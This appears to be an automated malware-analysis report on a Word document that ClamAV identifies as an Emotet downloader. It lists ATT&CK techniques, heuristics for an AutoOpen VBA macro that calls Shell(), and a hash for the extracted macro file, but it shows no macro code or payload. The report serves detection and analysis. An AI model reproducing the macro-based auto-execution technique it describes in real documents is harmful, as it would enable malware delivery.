Verdict: MALICIOUS
Risk Score: 242
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6968842-0', strongly suggesting the Emotet family. Critical heuristics indicate the presence of a VBA macro that uses the Shell() function, a common technique for executing downloaded payloads. The Autoopen macro is present and configured to execute the Shell() call, indicating an attempt to run malicious code upon opening the document.
Heuristics (7)
- ClamAV: Doc.Downloader.Emotet-6968842-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Downloader.Emotet-6968842-0
- VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 12254 bytes | 2ecb1e479ce657fdee4be8f991d9e71ac208c9a63ee1219cdfe4a5a43b19782c |

Script preview: first 1,000 lines of the extracted script.